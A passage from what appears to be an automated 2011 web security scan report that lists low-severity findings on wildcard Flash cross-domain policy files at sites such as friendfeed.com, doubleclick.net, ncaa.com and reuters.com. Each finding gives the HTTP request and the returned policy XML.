<allow-access-from domain="*.mycorplink.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.fanflex.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="preview.espncreativeworks.com" to-ports="*" secure="false"/>
...[SNIP]...

6.89. http://friendfeed.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://friendfeed.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: friendfeed.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 321
Vary: Cookie
Server: FriendFeedServer/0.1
Etag: "d69a789b2865b15041af5e97e97c7b933b34666a"
Cache-Control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.friendfeed.com"/>
<site-control permitted-cross-domain-policies="mast
...[SNIP]...

6.90. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sat, 03 Sep 2011 23:16:24 GMT
Expires: Sun, 04 Sep 2011 23:16:24 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 7573
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.91. http://grfx.cstv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://grfx.cstv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: grfx.cstv.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1717425046"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Content-Length: 909
Server: lighttpd/1.4.19
Date: Sun, 04 Sep 2011 00:45:29 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.92. http://ocp.ncaa.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ocp.ncaa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ocp.ncaa.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:08 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 7358
Keep-Alive: timeout=15, max=970
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...
<allow-access-from domain="*.dev.cbssports.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.g.doubleclick.net"/>
<allow-access-from domain="*.liverail.com"/>
...[SNIP]...

6.93. http://onlyfans.cstv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://onlyfans.cstv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: onlyfans.cstv.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:34 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Accept-Ranges: bytes
Content-Length: 909
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.94. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:00 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

6.95. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sat, 03 Sep 2011 23:17:24 GMT
Expires: Sun, 04 Sep 2011 23:17:24 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 6476
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.96. http://picasaweb.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Mon, 05 Sep 2011 01:23:13 GMT
Date: Sun, 04 Sep 2011 01:23:13 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.google.si" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

6.97. http://portfolio.us.reuters.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://portfolio.us.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: portfolio.us.reuters.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:23:24 GMT
Content-Length: 736
Content-Type: text/xml
Last-Modified: Tue, 24 Nov 2009 19:47:55 GMT
Accept-Ranges: bytes
ETag: "f8f85b43f6dca1:efb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" />
<al
...[SNIP]...
<allow-access-from domain="reuters.com" />
...[SNIP]...
<allow-access-from domain="reuters.com" />
...[SNIP]...
<allow-access-from domain="usa.qa.reuters.com" />
<allow-access-from domain="uk.qa.reuters.com" />
<allow-access-from domain="jp.qa.reuters.com" />
...[SNIP]...

6.98. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sun, 04 Sep 2011 00:13:02 GMT
Expires: Mon, 05 Sep 2011 00:13:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 4222
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.99. http://rd.rlcdn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.rlcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 500
Last-Modified: Fri, 02 Sep 2011 17:41:18 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.casualcollective.com" />
<allow-access-from domain="*.tubemogul.com" />
<allow-access-from domain="*.inplay.tubemogul.com" />
<allow-access-from domain="*.grooveshark.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adotube.com" />
...[SNIP]...

6.100. http://rtq.careerbuilder.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rtq.careerbuilder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

